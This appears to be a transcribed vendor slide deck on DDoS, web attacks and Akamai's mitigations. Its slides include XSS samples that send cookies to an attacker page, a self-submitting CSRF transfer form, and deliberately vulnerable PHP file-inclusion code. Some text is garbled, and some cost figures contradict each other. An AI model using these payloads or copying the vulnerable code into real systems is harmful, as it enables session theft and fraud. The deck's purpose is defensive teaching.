Internet Security and Akamai s Solutions. Preview of internet security today and how Akamai as cloud service provider mitigates attacks

Transcription

1 Internet Security and Akamai s Solutions Preview of internet security today and how Akamai as cloud service provider mitigates attacks

2 Agenda How much is the cost? The most costly causes Denial of Services Web Attacks Akamai s solutions

3 How much is the cost? 2013 Cost of Cyber Crime Study: United States Benchmark Study of U.S. Companies Ponemon Institute October 2013 Annualized cost of cyber crime Minimum : $1.3 million Maximum : $5.8 million Average : $8.9 million Increase 26% from 2012 Source :

4 The most costly causes 2013 Cost of Cyber Crime Study: United States Benchmark Study of U.S. Companies Ponemon Institute October 2013 Denial of Services Web-based attacks Malicious code account for more than 55 percent of all cyber crime costs per organization on an annual basis Source :

5 Denial of Services What is it? DDoS Akamai s solutions

6 Denial of Services : What is it? Intention : intended users not able to access service(s) Mode : exploit infrastructure limitations such as network bandwidth, maximum connections, memory and CPU resources, exploit protocol limitations Characteristics : burst of packet data

7 Denial of Services : Real-life Case

8 Denial of Services : DDoS attack

9 Denial of Services : Amplification

10 Denial of Services : DNS attack DNS server attacks, based on its characteristics : DNS relies on the Universal Datagram Protocol (UDP), a connectionless protocol that doesn t validate source IP addresses, which makes these addresses easy to forge. A small DNS request can solicit large amounts of data in a response.

11 Akamai s Solutions for DoS

12 Akamai s Solutions for DoS Distributed Perimeters : harder to burst Filtering packet data and only forwarding legitimate packet to server Network-layer control : drop network-layer DDoS attacks, define and enforce IP whitelists/blacklist Adaptive Rate control : application layer DoS

13 Web Attacks : SQL injection SQL Injection, where bogus database queries are used to overwhelm or infiltrate critical applications and databases

14 Web Attacks : SQL Injection Exploits nonsanitized input in application, to execute malicious SQL query

15 Web Attacks : Cross Site Scripting allow attackers to enter a script that is then executed in the user's browser, for example to steal cookie

16 Web Attacks : Cross Site Scripting Sample input into guestbook, forum, private message <SCRIPT type="text/javascript"> var adr = '../evil.php?cakemonster=' + escape(document.cookie); </SCRIPT>

17 XSS "><a href="#" onclick="document.location=' everyouwant.php?cookie=' +escape(document.cookie);"><click Me></a></script> Source :

18 Web Attacks : CSRF Combined with social engineering, to trick legitimate users to execute certain actions in target host

19 Web Attacks : CSRF Scheme

20 Web Attacks : CSRF Combined with social engineering, to trick legitimate users to execute certain actions in target host POST HTTP/1.1 acct=bob&amount=100

21 Web Attacks : CSRF Combined with social engineering, to trick legitimate users to execute certain actions in target host <form action=" method="post"> <input type="hidden" name="acct" value="maria"/> <input type="hidden" name="amount" value="100000"/> <input type="submit" value="view my pictures"/> </form> <body onload="document.forms[0].submit()"> <form...

22 Akamai s Solutions for Web Attacks Kona Site Defender with Web Application Firewall performs a 'deep inspection' of every request and response in every common form of Web traffic Kona Rules: Akamai s Threat Intelligence Team develops and updates WAF rules continually to address new and emerging web application attacks, such as SQL injections, cross-site scripting, remote file inclusion and more.

23 Akamai s Solutions for Web Attacks Application-Layer Controls: A collection of predefined, configurable application-layer firewall rules address categories such as Protocol Violations, Request Limit Violations, HTTP Policy Violations

24 To Attack Methods

25 Biggest saving from security technologies 2013 Cost of Cyber Crime Study: United States Source : Benchmark Study of U.S. Companies Ponemon Institute October 2013

26 Average days to resolve attack 2013 Cost of Cyber Crime Study: United States Benchmark Study of U.S. Companies Source : Ponemon Institute October 2013

27 Remote File Injection <?php // define $authorized = true only if user is authenticated if (authenticated_user()) { $authorized = true; } // Because we didn't first initialize $authorized as false, this might be // defined through register_globals, like from GET auth.php?authorized=1 // So, anyone can be seen as authenticated! if ($authorized) { include "/highly/sensitive/data.php"; }?>

28 Remote File Injection <?php $color = 'blue'; if (isset( $_GET['COLOR'] ) ) $color = $_GET['COLOR']; require( $color. '.php' );?>

29 CSRF prevention with Synchronizer Token <form action="/transfer.do" method="post"> <input type="hidden" name="csrftoken" value="owy4nmqwode4odrjn2q2ntlhmmzlywe... wyzu1ywqwmtvhm2jmngyxyjjimgi4mjjjzde1zdz... MGYwMGEwOA=="> </form>

30 How WAF prevents CSRF A random token is added to every form as it streams through the firewall and is validated on the requests. This builds on the unique strengths of the Application Firewall to do in-line parsing of html to store all the links and forms sent to the client in that session. The firewall can thus validate all form fields against a stored signature to ensure no fields are added or tampered with

31 How to prevent XSS First of all, encode all <, >, and. This should be the first step of your XSS filter. See encoding below: & > & < > < > > > > " > &#x27; / > /

32 Amplification Attacks DNS server attacks, based on its characteristics : DNS relies on the Universal Datagram Protocol (UDP), a connectionless protocol that doesn t validate source IP addresses, which makes these addresses easy to forge. A small DNS request can solicit large amounts of data in a response. NTP attacks Using UDP-based protocol that is prone to amplification attacks monlist command : 234 bytes could yield a response of 100 packets for a total more than 48K an amplification factor of 206x

33 SYN flood Source :

34 Widescreen Test Pattern (16:9) Aspect Ratio Test (Should appear circular) 4x3 16x9